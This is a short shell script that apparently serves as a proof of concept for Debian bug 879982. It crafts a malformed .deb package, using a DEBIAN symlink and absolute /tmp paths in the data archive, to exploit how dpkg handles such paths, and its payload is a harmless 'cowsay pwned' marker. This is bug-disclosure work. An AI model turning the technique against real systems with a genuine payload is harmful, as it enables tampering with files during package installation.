#!/bin/sh

# Copyright © 2017-2023 Jakub Wilk <jwilk@jwilk.net>
# SPDX-License-Identifier: MIT

# https://bugs.debian.org/879982

set -e -u
umask 022
mktargz() {
    tar --owner root --group root --mode 'u=rwX,go=rX' -I 'gzip -9n' -cf "$@"
}
if tty <&1 >/dev/null
then
    printf '%s: cowardly refusing to print to tty\n' "${0##*/}" >&2
    exit 1
fi
tmpdir=$(mktemp -d)
cd "$tmpdir"
printf '2.0\n' > debian-binary
cowsay pwned > moo
mktargz control.tar.gz moo
ln -sf tmp DEBIAN
mktargz data.tar.gz --transform 's,^tmp,/tmp,' DEBIAN
pax -M dist -x ar -w debian-binary control.tar.gz data.tar.gz
cd /
rm -rf "$tmpdir"

# vim:ts=4 sts=4 sw=4 et
